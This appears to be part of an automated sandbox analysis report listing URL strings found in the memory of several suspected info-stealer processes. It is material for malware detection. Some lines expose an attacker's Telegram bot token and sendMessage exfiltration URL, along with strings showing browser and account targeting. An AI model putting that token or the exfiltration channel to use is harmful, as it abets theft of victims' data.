Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.000000000334C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: be08f59021.exe, 00000016.00000003.3054113358.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.3054373991.000000000565C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cVN
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/DownloadIntegrat
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2414367084.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2446328037.0000024335687000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437020249.000002433567D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2436946866.000002433759C000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437383354.0000024335685000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: F0A3.tmp.ctx.exe, 00000027.00000003.2436286766.0000024335698000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2457958774.00000243374C0000.00000004.00001000.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2436213951.0000024337581000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: firefox.exe, 0000002C.00000003.2501375547.00000144ACC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/importCustomElementFromESModule
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AzVRM7c.exe, 0000000B.00000003.2097063443.000002E277414000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: AzVRM7c.exe, 0000000B.00000003.2097063443.000002E277414000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: explorer.exe, 00000014.00000003.3077732141.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3074284180.000000000D532000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: explorer.exe, 00000014.00000003.3074284180.000000000D198000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000014.00000003.3074284180.000000000D198000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSdE
Source: FBFF.tmp.fcxcx.exe, 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/$
Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/X
Source: explorer.exe, 00000014.00000000.2202639819.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2204496366.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2204496366.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/&
Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/-
Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/?tIH0
Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/Account
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/b
Source: t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D6459F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://api.telegram.org/botFailed
Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/m
Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/p
Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/r
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/v
Source: explorer.exe, 00000014.00000000.2216466843.0000000009390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comWzE
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162621750.0000026D6457B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore0
Source: dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore8
Source: dwVrTdy.exe, 0000000A.00000003.2051453805.000001CDE2B21000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051426857.000001CDE2B21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreE$
Source: AzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreK
Source: t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162805710.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreL
Source: AzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreY
Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033786317.000001B9CE44E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034384469.000001B9CE456000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033639099.000001B9CE443000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorejjK
Source: dwVrTdy.exe, 00000009.00000003.2033916766.000001B9CE439000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033727970.000001B9CE435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore~
Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034309451.000001B9CE464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxBY
Source: AzVRM7c.exe, 0000000B.00000003.2097752416.000002E27742C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097624301.000002E27742A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E277438000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097967560.000002E277446000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2099369210.000002E277450000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097821581.000002E277435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxD
Source: t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162982228.0000026D645BE000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxY
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000002C.00000002.2586946099.000001449CF11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsThe
Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/(
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/5
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/q
